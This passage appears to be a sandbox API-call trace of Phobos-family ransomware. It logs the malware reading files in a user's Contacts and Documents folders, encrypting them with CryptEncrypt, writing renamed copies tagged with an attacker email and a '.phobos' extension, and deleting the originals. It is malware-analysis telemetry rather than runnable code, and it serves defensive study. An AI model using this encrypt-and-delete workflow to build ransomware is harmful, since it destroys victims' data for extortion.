pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.594] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.594] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0204.594] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.594] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0204.594] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.594] CloseHandle (hObject=0x124) returned 1 [0204.594] CloseHandle (hObject=0x178) returned 1 [0204.594] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact")) returned 1 [0204.595] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.596] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1174) returned 1 [0204.596] CloseHandle (hObject=0x178) returned 1 [0204.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact")) returned 0x20 [0204.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.596] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.596] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.599] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.599] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.599] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x496, lpOverlapped=0x0) returned 1 [0204.603] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0, dwBufLen=0x4a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0) returned 1 [0204.603] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4a0, lpOverlapped=0x0) returned 1 [0204.604] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.604] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.604] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0204.604] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.604] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0204.604] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.604] CloseHandle (hObject=0x178) returned 1 [0204.604] CloseHandle (hObject=0x124) returned 1 [0204.604] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact")) returned 1 [0204.605] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.606] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1172) returned 1 [0204.606] CloseHandle (hObject=0x124) returned 1 [0204.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact")) returned 0x20 [0204.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.606] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.606] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.607] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.607] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x494, lpOverlapped=0x0) returned 1 [0204.646] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0, dwBufLen=0x4a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0) returned 1 [0204.646] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4a0, lpOverlapped=0x0) returned 1 [0204.647] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.647] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.647] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0204.648] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.648] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0204.648] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.648] CloseHandle (hObject=0x124) returned 1 [0204.648] CloseHandle (hObject=0x178) returned 1 [0204.648] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact")) returned 1 [0204.652] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\903fT4zIThIEKTyMuT7D.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\903ft4zithiektymut7d.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.654] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=79107) returned 1 [0204.654] CloseHandle (hObject=0x178) returned 1 [0204.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\903fT4zIThIEKTyMuT7D.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\903ft4zithiektymut7d.ots")) returned 0x20 [0204.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\903fT4zIThIEKTyMuT7D.ots.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\903ft4zithiektymut7d.ots.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\903fT4zIThIEKTyMuT7D.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\903ft4zithiektymut7d.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.654] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.654] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\903fT4zIThIEKTyMuT7D.ots.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\903ft4zithiektymut7d.ots.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.655] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.655] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.655] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x13503, lpOverlapped=0x0) returned 1 [0204.659] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x13510, dwBufLen=0x13510 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x13510) returned 1 [0204.661] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x13510, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x13510, lpOverlapped=0x0) returned 1 [0204.668] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.669] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.669] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0204.669] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.669] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0204.669] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.669] CloseHandle (hObject=0x178) returned 1 [0204.669] CloseHandle (hObject=0x124) returned 1 [0204.669] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\903fT4zIThIEKTyMuT7D.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\903ft4zithiektymut7d.ots")) returned 1 [0204.670] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\erKA1htmg.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\erka1htmg.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.673] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=87886) returned 1 [0204.675] CloseHandle (hObject=0x124) returned 1 [0204.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\erKA1htmg.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\erka1htmg.ots")) returned 0x20 [0204.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\erKA1htmg.ots.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\erka1htmg.ots.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\erKA1htmg.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\erka1htmg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.675] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.675] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\erKA1htmg.ots.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\erka1htmg.ots.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.676] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.676] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.676] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1574e, lpOverlapped=0x0) returned 1 [0204.763] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x15750, dwBufLen=0x15750 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x15750) returned 1 [0204.763] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x15750, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x15750, lpOverlapped=0x0) returned 1 [0204.777] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.777] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.777] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0204.777] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.777] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0204.778] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.778] CloseHandle (hObject=0x124) returned 1 [0204.778] CloseHandle (hObject=0x178) returned 1 [0204.778] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\erKA1htmg.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\erka1htmg.ots")) returned 1 [0204.779] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\ioAZiZSgJKDJy.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\ioazizsgjkdjy.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.780] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=34426) returned 1 [0204.780] CloseHandle (hObject=0x178) returned 1 [0204.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\ioAZiZSgJKDJy.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\ioazizsgjkdjy.odt")) returned 0x20 [0204.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\ioAZiZSgJKDJy.odt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\ioazizsgjkdjy.odt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.781] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\ioAZiZSgJKDJy.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\ioazizsgjkdjy.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.781] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.781] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.781] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\ioAZiZSgJKDJy.odt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\ioazizsgjkdjy.odt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.782] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.782] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.782] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x867a, lpOverlapped=0x0) returned 1 [0204.783] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8680, dwBufLen=0x8680 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8680) returned 1 [0204.783] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8680, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8680, lpOverlapped=0x0) returned 1 [0204.785] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.785] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.785] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, 